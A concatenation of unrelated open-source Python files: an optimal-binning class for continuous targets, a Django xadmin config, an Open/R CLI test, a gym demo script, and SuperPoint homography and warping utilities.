-------
x_new : numpy array, shape = (n_samples,)
Transformed array.
"""
return self.fit(x, y, check_input).transform(
x, metric, metric_special, metric_missing, show_digits,
check_input)
def transform(self, x, metric="mean", metric_special=0, metric_missing=0,
show_digits=2, check_input=False):
"""Transform given data to mean using bins from the fitted
optimal binning.
Parameters
----------
x : array-like, shape = (n_samples,)
Training vector, where n_samples is the number of samples.
metric : str (default="mean"):
The metric used to transform the input vector. Supported metrics
are "mean" to choose the mean, "indices" to assign the
corresponding indices of the bins and "bins" to assign the
corresponding bin interval.
metric_special : float or str (default=0)
The metric value to transform special codes in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
metric_missing : float or str (default=0)
The metric value to transform missing values in the input vector.
Supported metrics are "empirical" to use the empirical mean, and
any numerical value.
show_digits : int, optional (default=2)
The number of significant digits of the bin column. Applies when
``metric="bins"``.
check_input : bool (default=False)
Whether to check input arrays.
Returns
-------
x_new : numpy array, shape = (n_samples,)
Transformed array.
Notes
-----
Transformation of data including categories not present during training
return zero mean.
"""
self._check_is_fitted()
return transform_continuous_target(self._splits_optimal, self.dtype,
x, self._n_records, self._sums,
self.special_codes,
self._categories, self._cat_others,
metric, metric_special,
metric_missing, self.user_splits,
show_digits, check_input)
def _fit(self, x, y, check_input):
time_init = time.perf_counter()
if self.verbose:
logger.info("Optimal binning started.")
logger.info("Options: check parameters.")
_check_parameters(**self.get_params())
# Pre-processing
if self.verbose:
logger.info("Pre-processing started.")
self._n_samples = len(x)
if self.verbose:
logger.info("Pre-processing: number of samples: {}"
.format(self._n_samples))
time_preprocessing = time.perf_counter()
[x_clean, y_clean, x_missing, y_missing, x_special, y_special,
y_others, categories, cat_others, _, _, _, _] = split_data(
self.dtype, x, y, self.special_codes, self.cat_cutoff,
self.user_splits, check_input, self.outlier_detector,
self.outlier_params)
self._time_preprocessing = time.perf_counter() - time_preprocessing
if self.verbose:
n_clean = len(x_clean)
n_missing = len(x_missing)
n_special = len(x_special)
logger.info("Pre-processing: number of clean samples: {}"
.format(n_clean))
logger.info("Pre-processing: number of missing samples: {}"
.format(n_missing))
logger.info("Pre-processing: number of special samples: {}"
.format(n_special))
if self.outlier_detector is not None:
n_outlier = self._n_samples-(n_clean + n_missing + n_special)
logger.info("Pre-processing: number of outlier samples: {}"
.format(n_outlier))
if self.dtype == "categorical":
n_categories = len(categories)
n_categories_others = len(cat_others)
n_others = len(y_others)
logger.info("Pre-processing: number of others samples: {}"
.format(n_others))
logger.info("Pre-processing: number of categories: {}"
.format(n_categories))
logger.info("Pre-processing: number of categories others: {}"
.format(n_categories_others))
logger.info("Pre-processing terminated. Time: {:.4f}s"
.format(self._time_preprocessing))
# Pre-binning
if self.verbose:
logger.info("Pre-binning started.")
time_prebinning = time.perf_counter()
if self.user_splits is not None:
n_splits = len(self.user_splits)
if self.verbose:
logger.info("Pre-binning: user splits supplied: {}"
.format(n_splits))
if not n_splits:
splits = self.user_splits
n_records = np.array([])
sums = np.array([])
stds = np.array([])
else:
if self.dtype == "numerical":
user_splits = check_array(
self.user_splits, ensure_2d=False, dtype=None,
force_all_finite=True)
if len(set(user_splits)) != len(user_splits):
raise ValueError("User splits are not unique.")
sorted_idx = np.argsort(user_splits)
user_splits = user_splits[sorted_idx]
else:
[categories, user_splits, x_clean, y_clean, y_others,
cat_others, _, _, sorted_idx
] = preprocessing_user_splits_categorical(
self.user_splits, x_clean, y_clean, None)
if self.user_splits_fixed is not None:
self.user_splits_fixed = np.asarray(
self.user_splits_fixed)[sorted_idx]
[splits, n_records, sums, ssums, stds, min_t, max_t,
n_zeros] = self._prebinning_refinement(
user_splits, x_clean, y_clean, y_missing, x_special,
y_special, y_others)
else:
[splits, n_records, sums, ssums, stds, min_t, max_t,
n_zeros] = self._fit_prebinning(
x_clean, y_clean, y_missing, x_special, y_special, y_others)
self._n_prebins = len(n_records)
self._categories = categories
self._cat_others = cat_others
self._time_prebinning = time.perf_counter() - time_prebinning
if self.verbose:
logger.info("Pre-binning: number of prebins: {}"
.format(self._n_prebins))
logger.info("Pre-binning terminated. Time: {:.4f}s"
.format(self._time_prebinning))
# Optimization
self._fit_optimizer(splits, n_records, sums, ssums, stds)
# Post-processing
if self.verbose:
logger.info("Post-processing started.")
logger.info("Post-processing: compute binning information.")
time_postprocessing = time.perf_counter()
if not len(splits):
n_records = n_records.sum()
sums = sums.sum()
[self._n_records, self._sums, self._stds, self._min_target,
self._max_target, self._n_zeros] = continuous_bin_info(
self._solution, n_records, sums, ssums, stds, min_t, max_t,
n_zeros, self._n_records_missing, self._sum_missing,
self._std_missing, self._min_target_missing,
self._max_target_missing, self._n_zeros_missing,
self._n_records_special, self._sum_special, self._std_special,
self._min_target_special, self._max_target_special,
self._n_zeros_special, self._n_records_cat_others,
self._sum_cat_others, self._std_cat_others,
self._min_target_others, self._max_target_others,
self._n_zeros_others, self._cat_others)
if self.dtype == "numerical":
min_x = x_clean.min()
max_x = x_clean.max()
else:
min_x = None
max_x = None
self._binning_table = ContinuousBinningTable(
self.name, self.dtype, self.special_codes, self._splits_optimal,
self._n_records, self._sums, self._stds, self._min_target,
self._max_target, self._n_zeros, min_x, max_x, self._categories,
self._cat_others, self.user_splits)
self._time_postprocessing = time.perf_counter() - time_postprocessing
if self.verbose:
logger.info("Post-processing terminated. Time: {:.4f}s"
.format(self._time_postprocessing))
self._time_total = time.perf_counter() - time_init
if self.verbose:
logger.info("Optimal binning terminated. Status: {}. Time: {:.4f}s"
.format(self._status, self._time_total))
# Completed successfully
self._is_fitted = True
return self
def _fit_optimizer(self, splits, n_records, sums, ssums, stds):
if self.verbose:
logger.info("Optimizer started.")
time_init = time.perf_counter()
if len(n_records) <= 1:
self._status = "OPTIMAL"
self._splits_optimal = splits
self._solution = np.zeros(len(splits)).astype(bool)
if self.verbose:
logger.warning("Optimizer: {} bins after pre-binning."
.format(len(n_records)))
logger.warning("Optimizer: solver not run.")
logger.info("Optimizer terminated. Time: 0s")
return
if self.min_bin_size is not None:
min_bin_size = int(np.ceil(self.min_bin_size * self._n_samples))
else:
min_bin_size = self.min_bin_size
if self.max_bin_size is not None:
max_bin_size = int(np.ceil(self.max_bin_size * self._n_samples))
else:
max_bin_size = self.max_bin_size
# Monotonic trend
trend_change = None
if self.dtype == "numerical":
auto_monotonic_modes = ("auto", "auto_heuristic", "auto_asc_desc")
if self.monotonic_trend in auto_monotonic_modes:
monotonic = auto_monotonic_continuous(
n_records, sums, self.monotonic_trend)
if self.monotonic_trend == "auto_heuristic":
if monotonic in ("peak", "valley"):
if monotonic == "peak":
monotonic = "peak_heuristic"
else:
monotonic = "valley_heuristic"
mean = sums / n_records
trend_change = peak_valley_trend_change_heuristic(
mean, monotonic)
if self.verbose:
logger.info("Optimizer: classifier predicts {} "
"monotonic trend.".format(monotonic))
else:
monotonic = self.monotonic_trend
if monotonic in ("peak_heuristic", "valley_heuristic"):
mean = sums / n_records
trend_change = peak_valley_trend_change_heuristic(
mean, monotonic)
else:
monotonic = self.monotonic_trend
if monotonic is not None:
monotonic = "ascending"
if self.verbose:
if monotonic is None:
logger.info(
"Optimizer: monotonic trend not set.")
else:
logger.info("Optimizer: monotonic trend set to {}."
.format(monotonic))
optimizer = ContinuousBinningCP(monotonic, self.min_n_bins,
self.max_n_bins, min_bin_size,
max_bin_size, self.min_mean_diff,
self.max_pvalue,
self.max_pvalue_policy,
self.user_splits_fixed,
self.time_limit)
if self.verbose:
logger.info("Optimizer: build model...")
optimizer.build_model(n_records, sums, ssums, trend_change)
if self.verbose:
logger.info("Optimizer: solve...")
status, solution = optimizer.solve()
self._solution = solution
self._optimizer, self._time_optimizer = solver_statistics(
self.solver, optimizer.solver_)
self._status = status
if self.dtype == "categorical" and self.user_splits is not None:
self._splits_optimal = splits[solution]
else:
self._splits_optimal = splits[solution[:-1]]
self._time_solver = time.perf_counter() - time_init
if self.verbose:
logger.info("Optimizer terminated. Time: {:.4f}s"
.format(self._time_solver))
def _prebinning_refinement(self, splits_prebinning, x, y, y_missing,
x_special, y_special, y_others, sw_clean=None,
sw_missing=None, sw_special=None,
sw_others=None):
n_splits = len(splits_prebinning)
if not n_splits:
return splits_prebinning, np.array([]), np.array([])
if self.split_digits is not None:
splits_prebinning = np.round(splits_prebinning, self.split_digits)
if self.dtype == "categorical" and self.user_splits is not None:
indices = np.digitize(x, splits_prebinning, right=True)
n_bins = n_splits
else:
indices = np.digitize(x, splits_prebinning, right=False)
n_bins = n_splits + 1
# Compute n_records, sum and std for special, missing and others
# self._n_records_special = len(y_special)
# self._sum_special = np.sum(y_special)
# self._n_zeros_special = np.count_nonzero(y_special == 0)
# if len(y_special):
# self._std_special = np.std(y_special)
# self._min_target_special = np.min(y_special)
# self._max_target_special = np.max(y_special)
[self._n_records_special, self._sum_special, self._n_zeros_special,
self._std_special, self._min_target_special,
self._max_target_special] = target_info_special_continuous(
self.special_codes, x_special, y_special)
self._n_records_missing = len(y_missing)
self._sum_missing = np.sum(y_missing)
self._n_zeros_missing = np.count_nonzero(y_missing == 0)
if len(y_missing):
self._std_missing = np.std(y_missing)
self._min_target_missing = np.min(y_missing)
self._max_target_missing = np.max(y_missing)
if len(y_others):
self._n_records_cat_others = len(y_others)
self._sum_cat_others = np.sum(y_others)
self._std_cat_others = np.std(y_others)
self._min_target_others = np.min(y_others)
self._max_target_others = np.max(y_others)
self._n_zeros_others = np.count_nonzero(y_others == 0)
n_records = np.empty(n_bins).astype(np.int64)
sums = np.empty(n_bins)
ssums = np.empty(n_bins)
stds = np.empty(n_bins)
n_zeros = np.empty(n_bins).astype(np.int64)
min_t = np.full(n_bins, -np.inf)
max_t = np.full(n_bins, np.inf)
# Compute prebin information
for i in range(n_bins):
mask = (indices == i)
n_records[i] = np.count_nonzero(mask)
ymask = y[mask]
sums[i] = np.sum(ymask)
ssums[i] = np.sum(ymask ** 2)
stds[i] = np.std(ymask)
n_zeros[i] = np.count_nonzero(ymask == 0)
if len(ymask):
min_t[i] = np.min(ymask)
max_t[i] = np.max(ymask)
return (splits_prebinning, n_records, sums, ssums, stds, min_t, max_t,
n_zeros)
@property
def binning_table(self):
"""Return an instantiated binning table. Please refer to
:ref:`Binning table: continuous target`.
Returns
-------
binning_table : ContinuousBinningTable.
"""
self._check_is_fitted()
return self._binning_table
|
server/apps/movie/adminx.py
|
Mayandev/django_morec
| 129 |
101656
|
<filename>server/apps/movie/adminx.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019-04-19 20:45
# @Author : Mayandev
# @Site : https://github.com/Mayandev/
# @File : adminx.py
# @Software: PyCharm
import xadmin
from .models import Movie, Genre
class MovieAdmin(object):
list_display = ['id', 'closest_movie', 'doubanId']
model_icon = 'fa fa-ticket'
class GenreAdmin(object):
list_display = ['id', 'genre']
model_icon = 'fa fa-ticket'
xadmin.site.register(Movie, MovieAdmin)
xadmin.site.register(Genre, GenreAdmin)
|
openr/py/openr/cli/tests/prefixmgr/tests.py
|
nathanawmk/openr
| 880 |
101662
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
from typing import Optional
from unittest.mock import MagicMock, patch
from click.testing import CliRunner
from later.unittest import TestCase
from openr.cli.clis import prefix_mgr
from openr.cli.tests import helpers
from .fixtures import (
MOCKED_ADVERTISED_ROUTES,
ADVERTISED_ROUTES_OUTPUT,
ADVERTISED_ROUTES_OUTPUT_DETAILED,
ADVERTISED_ROUTES_OUTPUT_JSON,
)
BASE_MODULE = "openr.cli.clis.prefix_mgr"
BASE_CMD_MODULE = "openr.cli.commands.prefix_mgr"
class CliPrefixManagerTests(TestCase):
maxDiff: Optional[int] = None
def setUp(self) -> None:
self.runner = CliRunner()
def test_help(self) -> None:
invoked_return = self.runner.invoke(
prefix_mgr.PrefixMgrCli.prefixmgr,
["--help"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
@patch(helpers.COMMANDS_GET_OPENR_CTRL_CLIENT)
def test_prefixmgr_advertised_routes(self, mocked_openr_client: MagicMock) -> None:
# Set mock data for testing
mocked_returned_connection = helpers.get_enter_thrift_magicmock(
mocked_openr_client
)
mocked_returned_connection.getAdvertisedRoutesFiltered.return_value = (
MOCKED_ADVERTISED_ROUTES
)
# Invoke with no flags & verify output
invoked_return = self.runner.invoke(
prefix_mgr.AdvertisedRoutesCli.show,
["all"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
self.assertEqual(ADVERTISED_ROUTES_OUTPUT, invoked_return.stdout)
# Invoke with [--detail] & verify output
invoked_return = self.runner.invoke(
prefix_mgr.AdvertisedRoutesCli.show,
["--detail", "all"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
self.assertEqual(ADVERTISED_ROUTES_OUTPUT_DETAILED, invoked_return.stdout)
# Invoke with [--json] & verify output
invoked_return = self.runner.invoke(
prefix_mgr.AdvertisedRoutesCli.show,
["--json", "all"],
catch_exceptions=False,
)
self.assertEqual(0, invoked_return.exit_code)
self.assertEqual(ADVERTISED_ROUTES_OUTPUT_JSON, invoked_return.stdout)
|
rl/test.py
|
fancyerii/blog-codes
| 159 |
101668
|
<gh_stars>100-1000
import gym
import numpy as np
from matplotlib import pyplot as plt
env = gym.envs.make("MountainCar-v0")
env.reset()
plt.figure()
plt.imshow(env.render(mode='rgb_array'))
for x in range(1000):
env.step(1)
plt.figure()
plt.imshow(env.render(mode='rgb_array'))
env.render(close=False)
|
utils/utils.py
|
Dai-z/pytorch-superpoint
| 390 |
101683
|
"""util functions
# many old functions, need to clean up
# homography --> homography
# warping
# loss --> delete if useless
"""
import numpy as np
import torch
from pathlib import Path
import datetime
import datetime
from collections import OrderedDict
import torch.nn.functional as F
import torch.nn as nn
###### check
# from utils.nms_pytorch import box_nms as box_nms_retinaNet
from utils.d2s import DepthToSpace, SpaceToDepth
def img_overlap(img_r, img_g, img_gray): # img_b repeat
def to_3d(img):
if len(img.shape) == 2:
img = img[np.newaxis, ...]
return img
img_r, img_g, img_gray = to_3d(img_r), to_3d(img_g), to_3d(img_gray)
img = np.concatenate((img_gray, img_gray, img_gray), axis=0)
img[0, :, :] += img_r[0, :, :]
img[1, :, :] += img_g[0, :, :]
img[img > 1] = 1
img[img < 0] = 0
return img
def thd_img(img, thd=0.015):
img[img < thd] = 0
img[img >= thd] = 1
return img
def toNumpy(tensor):
return tensor.detach().cpu().numpy()
def save_path_formatter(args, parser):
print("todo: save path")
return Path('.')
pass
'''
def save_path_formatter(args, parser):
def is_default(key, value):
return value == parser.get_default(key)
args_dict = vars(args)
# data_folder_name = str(Path(args_dict['data']).normpath().name)
data_folder_name = str(Path(args_dict['data']))
folder_string = [data_folder_name]
if not is_default('epochs', args_dict['epochs']):
folder_string.append('{}epochs'.format(args_dict['epochs']))
keys_with_prefix = OrderedDict()
keys_with_prefix['epoch_size'] = 'epoch_size'
keys_with_prefix['sequence_length'] = 'seq'
keys_with_prefix['rotation_mode'] = 'rot_'
keys_with_prefix['padding_mode'] = 'padding_'
keys_with_prefix['batch_size'] = 'b'
keys_with_prefix['lr'] = 'lr'
keys_with_prefix['photo_loss_weight'] = 'p'
keys_with_prefix['mask_loss_weight'] = 'm'
keys_with_prefix['smooth_loss_weight'] = 's'
for key, prefix in keys_with_prefix.items():
value = args_dict[key]
if not is_default(key, value):
folder_string.append('{}{}'.format(prefix, value))
save_path = Path(','.join(folder_string))
timestamp = datetime.datetime.now().strftime("%m-%d-%H:%M")
return save_path/timestamp
# return ''
'''
def tensor2array(tensor, max_value=255, colormap='rainbow', channel_first=True):
tensor = tensor.detach().cpu()
if max_value is None:
max_value = tensor.max().item()
if tensor.ndimension() == 2 or tensor.size(0) == 1:
try:
import cv2
if int(cv2.__version__[0]) >= 3:
color_cvt = cv2.COLOR_BGR2RGB
else: # 2.4
color_cvt = cv2.cv.CV_BGR2RGB
if colormap == 'rainbow':
colormap = cv2.COLORMAP_RAINBOW
elif colormap == 'bone':
colormap = cv2.COLORMAP_BONE
array = (255*tensor.squeeze().numpy()/max_value).clip(0, 255).astype(np.uint8)
colored_array = cv2.applyColorMap(array, colormap)
array = cv2.cvtColor(colored_array, color_cvt).astype(np.float32)/255
except ImportError:
if tensor.ndimension() == 2:
tensor.unsqueeze_(2)
array = (tensor.expand(tensor.size(0), tensor.size(1), 3).numpy()/max_value).clip(0,1)
if channel_first:
array = array.transpose(2, 0, 1)
elif tensor.ndimension() == 3:
assert(tensor.size(0) == 3)
array = 0.5 + tensor.numpy()*0.5
if not channel_first:
array = array.transpose(1, 2, 0)
return array
# from utils.utils import find_files_with_ext
def find_files_with_ext(directory, extension='.npz'):
# print(os.listdir(directory))
list_of_files = []
import os
if extension == ".npz":
for l in os.listdir(directory):
if l.endswith(extension):
list_of_files.append(l)
# print(l)
return list_of_files
def save_checkpoint(save_path, net_state, epoch, filename='checkpoint.pth.tar'):
file_prefix = ['superPointNet']
# torch.save(net_state, save_path)
filename = '{}_{}_{}'.format(file_prefix[0], str(epoch), filename)
torch.save(net_state, save_path/filename)
print("save checkpoint to ", filename)
pass
def load_checkpoint(load_path, filename='checkpoint.pth.tar'):
file_prefix = ['superPointNet']
filename = '{}__{}'.format(file_prefix[0], filename)
# torch.save(net_state, save_path)
checkpoint = torch.load(load_path/filename)
print("load checkpoint from ", filename)
return checkpoint
pass
def saveLoss(filename, iter, loss, task='train', **options):
# save_file = save_output / "export.txt"
with open(filename, "a") as myfile:
myfile.write(task + " iter: " + str(iter) + ", ")
myfile.write("loss: " + str(loss) + ", ")
myfile.write(str(options))
myfile.write("\n")
# myfile.write("iter: " + str(iter) + '\n')
# myfile.write("output pairs: " + str(count) + '\n')
def saveImg(img, filename):
import cv2
cv2.imwrite(filename, img)
def pltImshow(img):
from matplotlib import pyplot as plt
plt.imshow(img)
plt.show()
def loadConfig(filename):
import yaml
with open(filename, 'r') as f:
config = yaml.load(f)
return config
def append_csv(file='foo.csv', arr=[]):
import csv
# fields=['first','second','third']
# pre = lambda i: ['{0:.3f}'.format(x) for x in i]
with open(file, 'a') as f:
writer = csv.writer(f)
if type(arr[0]) is list:
for a in arr:
writer.writerow(a)
# writer.writerow(pre(a))
# print(pre(a))
else:
writer.writerow(arr)
'''
def save_checkpoint(save_path, dispnet_state, exp_pose_state, is_best, filename='checkpoint.pth.tar'):
file_prefixes = ['dispnet', 'exp_pose']
states = [dispnet_state, exp_pose_state]
for (prefix, state) in zip(file_prefixes, states):
torch.save(state, save_path/'{}_{}'.format(prefix,filename))
if is_best:
for prefix in file_prefixes:
shutil.copyfile(save_path/'{}_{}'.format(prefix,filename), save_path/'{}_model_best.pth.tar'.format(prefix))
'''
import cv2
def sample_homography(inv_scale=3):
corner_img = np.array([(-1, -1), (-1, 1), (1, -1), (1, 1)])
# offset_r = 1 - 1/inv_scale
# img_offset = np.array([(-1, -1), (-1, offset_r), (offset_r, -1), (offset_r, offset_r)])
img_offset = corner_img
corner_map = (np.random.rand(4,2)-0.5)*2/(inv_scale + 0.01) + img_offset
matrix = cv2.getPerspectiveTransform(np.float32(corner_img), np.float32(corner_map))
return matrix
def sample_homographies(batch_size=1, scale=10, device='cpu'):
## sample homography matrix
# mat_H = [sample_homography(inv_scale=scale) for i in range(batch_size)]
mat_H = [sample_homography(inv_scale=scale) for i in range(batch_size)]
##### debug
# from utils.utils import sample_homo
# mat_H = [sample_homo(image=np.zeros((1,1))) for i in range(batch_size)]
# mat_H = [np.identity(3) for i in range(batch_size)]
mat_H = np.stack(mat_H, axis=0)
mat_H = torch.tensor(mat_H, dtype=torch.float32)
mat_H = mat_H.to(device)
mat_H_inv = torch.stack([torch.inverse(mat_H[i, :, :]) for i in range(batch_size)])
mat_H_inv = torch.tensor(mat_H_inv, dtype=torch.float32)
mat_H_inv = mat_H_inv.to(device)
return mat_H, mat_H_inv
def warpLabels(pnts, homography, H, W):
import torch
"""
input:
pnts: numpy
homography: numpy
output:
warped_pnts: numpy
"""
from utils.utils import warp_points
from utils.utils import filter_points
pnts = torch.tensor(pnts).long()
homography = torch.tensor(homography, dtype=torch.float32)
warped_pnts = warp_points(torch.stack((pnts[:, 0], pnts[:, 1]), dim=1),
homography) # check the (x, y)
warped_pnts = filter_points(warped_pnts, torch.tensor([W, H])).round().long()
return warped_pnts.numpy()
def warp_points_np(points, homographies, device='cpu'):
"""
Warp a list of points with the given homography.
Arguments:
points: list of N points, shape (N, 2).
homography: batched or not (shapes (B, 3, 3) and (...) respectively).
Returns: a Tensor of shape (N, 2) or (B, N, 2) (depending on whether the homography
is batched) containing the new coordinates of the warped points.
"""
# expand points len to (x, y, 1)
batch_size = homographies.shape[0]
points = np.concatenate((points, np.ones((points.shape[0], 1))), axis=1)
# points = points.to(device)
# homographies = homographies.(batch_size*3,3)
# warped_points = homographies*points
# warped_points = [email protected](0,1)
warped_points = np.tensordot(homographies, points.transpose(), axes=([2], [0]))
# normalize the points
warped_points = warped_points.reshape([batch_size, 3, -1])
warped_points = warped_points.transpose([0, 2, 1])
warped_points = warped_points[:, :, :2] / warped_points[:, :, 2:]
return warped_points
def homography_scaling(homography, H, W):
trans = np.array([[2./W, 0., -1], [0., 2./H, -1], [0., 0., 1.]])
homography = np.linalg.inv(trans) @ homography @ trans
return homography
def homography_scaling_torch(homography, H, W):
trans = torch.tensor([[2./W, 0., -1], [0., 2./H, -1], [0., 0., 1.]])
homography = (trans.inverse() @ homography @ trans)
return homography
def filter_points(points, shape, return_mask=False):
### check!
points = points.float()
shape = shape.float()
mask = (points >= 0) * (points <= shape-1)
mask = (torch.prod(mask, dim=-1) == 1)
if return_mask:
return points[mask], mask
return points [mask]
# return points [torch.prod(mask, dim=-1) == 1]
def warp_points(points, homographies, device='cpu'):
"""
Warp a list of points with the given homography.
Arguments:
points: list of N points, shape (N, 2(x, y))).
homography: batched or not (shapes (B, 3, 3) and (...) respectively).
Returns: a Tensor of shape (N, 2) or (B, N, 2(x, y)) (depending on whether the homography
is batched) containing the new coordinates of the warped points.
"""
# expand points len to (x, y, 1)
no_batches = len(homographies.shape) == 2
homographies = homographies.unsqueeze(0) if no_batches else homographies
# homographies = homographies.unsqueeze(0) if len(homographies.shape) == 2 else homographies
batch_size = homographies.shape[0]
points = torch.cat((points.float(), torch.ones((points.shape[0], 1)).to(device)), dim=1)
points = points.to(device)
homographies = homographies.view(batch_size*3,3)
# warped_points = homographies*points
# points = points.double()
warped_points = [email protected](0,1)
# warped_points = np.tensordot(homographies, points.transpose(), axes=([2], [0]))
# normalize the points
warped_points = warped_points.view([batch_size, 3, -1])
warped_points = warped_points.transpose(2, 1)
warped_points = warped_points[:, :, :2] / warped_points[:, :, 2:]
return warped_points[0,:,:] if no_batches else warped_points
# from utils.utils import inv_warp_image_batch
def inv_warp_image_batch(img, mat_homo_inv, device='cpu', mode='bilinear'):
'''
Inverse warp images in batch
:param img:
batch of images
tensor [batch_size, 1, H, W]
:param mat_homo_inv:
batch of homography matrices
tensor [batch_size, 3, 3]
:param device:
GPU device or CPU
:return:
batch of warped images
tensor [batch_size, 1, H, W]
'''
# compute inverse warped points
if len(img.shape) == 2 or len(img.shape) == 3:
img = img.view(1,1,img.shape[0], img.shape[1])
if len(mat_homo_inv.shape) == 2:
mat_homo_inv = mat_homo_inv.view(1,3,3)
Batch, channel, H, W = img.shape
coor_cells = torch.stack(torch.meshgrid(torch.linspace(-1, 1, W), torch.linspace(-1, 1, H)), dim=2)
coor_cells = coor_cells.transpose(0, 1)
coor_cells = coor_cells.to(device)
coor_cells = coor_cells.contiguous()
src_pixel_coords = warp_points(coor_cells.view([-1, 2]), mat_homo_inv, device)
src_pixel_coords = src_pixel_coords.view([Batch, H, W, 2])
src_pixel_coords = src_pixel_coords.float()
warped_img = F.grid_sample(img, src_pixel_coords, mode=mode, align_corners=True)
return warped_img
def inv_warp_image(img, mat_homo_inv, device='cpu', mode='bilinear'):
'''
Inverse warp images in batch
:param img:
batch of images
tensor [H, W]
:param mat_homo_inv:
batch of homography matrices
tensor [3, 3]
:param device:
GPU device or CPU
:return:
batch of warped images
tensor [H, W]
'''
warped_img = inv_warp_image_batch(img, mat_homo_inv, device, mode)
return warped_img.squeeze()
def labels2Dto3D(labels, cell_size, add_dustbin=True):
'''
Change the shape of labels into 3D. Batch of labels.
:param labels:
tensor [batch_size, 1, H, W]
keypoint map.
:param cell_size:
8
:return:
labels: tensors[batch_size, 65, Hc, Wc]
'''
batch_size, channel, H, W = labels.shape
Hc, Wc = H // cell_size, W // cell_size
space2depth = SpaceToDepth(8)
# labels = space2depth(labels).squeeze(0)
labels = space2depth(labels)
# labels = labels.view(batch_size, H, 1, W, 1)
# labels = labels.view(batch_size, Hc, cell_size, Wc, cell_size)
# labels = labels.transpose(1, 2).transpose(3, 4).transpose(2, 3)
# labels = labels.reshape(batch_size, 1, cell_size ** 2, Hc, Wc)
# labels = labels.view(batch_size, cell_size ** 2, Hc, Wc)
if add_dustbin:
dustbin = labels.sum(dim=1)
dustbin = 1 - dustbin
dustbin[dustbin < 1.] = 0
# print('dust: ', dustbin.shape)
# labels = torch.cat((labels, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
labels = torch.cat((labels, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
## norm
dn = labels.sum(dim=1)
labels = labels.div(torch.unsqueeze(dn, 1))
return labels
def labels2Dto3D_flattened(labels, cell_size):
'''
Change the shape of labels into 3D. Batch of labels.
:param labels:
tensor [batch_size, 1, H, W]
keypoint map.
:param cell_size:
8
:return:
labels: tensors[batch_size, 65, Hc, Wc]
'''
batch_size, channel, H, W = labels.shape
Hc, Wc = H // cell_size, W // cell_size
space2depth = SpaceToDepth(8)
# labels = space2depth(labels).squeeze(0)
labels = space2depth(labels)
# print("labels in 2Dto3D: ", labels.shape)
# labels = labels.view(batch_size, H, 1, W, 1)
# labels = labels.view(batch_size, Hc, cell_size, Wc, cell_size)
# labels = labels.transpose(1, 2).transpose(3, 4).transpose(2, 3)
# labels = labels.reshape(batch_size, 1, cell_size ** 2, Hc, Wc)
# labels = labels.view(batch_size, cell_size ** 2, Hc, Wc)
dustbin = torch.ones((batch_size, 1, Hc, Wc)).cuda()
# labels = torch.cat((labels, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
labels = torch.cat((labels*2, dustbin.view(batch_size, 1, Hc, Wc)), dim=1)
labels = torch.argmax(labels, dim=1)
return labels
def old_flatten64to1(semi, tensor=False):
'''
Flatten 3D np array to 2D
:param semi:
np [64 x Hc x Wc]
or
tensor (batch_size, 65, Hc, Wc)
:return:
flattened map
np [1 x Hc*8 x Wc*8]
or
tensor (batch_size, 1, Hc*8, Wc*8)
'''
if tensor:
is_batch = len(semi.size()) == 4
if not is_batch:
semi = semi.unsqueeze_(0)
Hc, Wc = semi.size()[2], semi.size()[3]
cell = 8
semi.transpose_(1, 2)
semi.transpose_(2, 3)
semi = semi.view(-1, Hc, Wc, cell, cell)
semi.transpose_(2, 3)
semi = semi.contiguous()
semi = semi.view(-1, 1, Hc * cell, Wc * cell)
heatmap = semi
if not is_batch:
heatmap = heatmap.squeeze_(0)
else:
Hc, Wc = semi.shape[1], semi.shape[2]
cell = 8
semi = semi.transpose(1, 2, 0)
heatmap = np.reshape(semi, [Hc, Wc, cell, cell])
heatmap = np.transpose(heatmap, [0, 2, 1, 3])
# heatmap = np.transpose(heatmap, [2, 0, 3, 1])
heatmap = np.reshape(heatmap, [Hc * cell, Wc * cell])
heatmap = heatmap[np.newaxis, :, :]
return heatmap
def flattenDetection(semi, tensor=False):
'''
Flatten detection output
:param semi:
output from detector head
tensor [65, Hc, Wc]
:or
tensor (batch_size, 65, Hc, Wc)
:return:
3D heatmap
np (1, H, C)
:or
tensor (batch_size, 65, Hc, Wc)
'''
batch = False
if len(semi.shape) == 4:
batch = True
batch_size = semi.shape[0]
# if tensor:
# semi.exp_()
# d = semi.sum(dim=1) + 0.00001
# d = d.view(d.shape[0], 1, d.shape[1], d.shape[2])
# semi = semi / d # how to /(64,15,20)
# nodust = semi[:, :-1, :, :]
# heatmap = flatten64to1(nodust, tensor=tensor)
# else:
# Convert pytorch -> numpy.
# --- Process points.
# dense = nn.functional.softmax(semi, dim=0) # [65, Hc, Wc]
if batch:
dense = nn.functional.softmax(semi, dim=1) # [batch, 65, Hc, Wc]
# Remove dustbin.
nodust = dense[:, :-1, :, :]
else:
dense = nn.functional.softmax(semi, dim=0) # [65, Hc, Wc]
nodust = dense[:-1, :, :].unsqueeze(0)
# Reshape to get full resolution heatmap.
# heatmap = flatten64to1(nodust, tensor=True) # [1, H, W]
depth2space = DepthToSpace(8)
heatmap = depth2space(nodust)
heatmap = heatmap.squeeze(0) if not batch else heatmap
return heatmap
def sample_homo(image):
import tensorflow as tf
from utils.homographies import sample_homography
H = sample_homography(tf.shape(image)[:2])
with tf.Session():
H_ = H.eval()
H_ = np.concatenate((H_, np.array([1])[:, np.newaxis]), axis=1)
# warped_im = tf.contrib.image.transform(image, H, interpolation="BILINEAR")
mat = np.reshape(H_, (3, 3))
# for i in range(batch):
# np.stack()
return mat
import cv2
def getPtsFromHeatmap(heatmap, conf_thresh, nms_dist):
'''
:param self:
:param heatmap:
np (H, W)
:return:
'''
border_remove = 4
H, W = heatmap.shape[0], heatmap.shape[1]
xs, ys = np.where(heatmap >= conf_thresh) # Confidence threshold.
sparsemap = (heatmap >= conf_thresh)
if len(xs) == 0:
return np.zeros((3, 0))
pts = np.zeros((3, len(xs))) # Populate point data sized 3xN.
pts[0, :] = ys
pts[1, :] = xs
pts[2, :] = heatmap[xs, ys]
pts, _ = nms_fast(pts, H, W, dist_thresh=nms_dist) # Apply NMS.
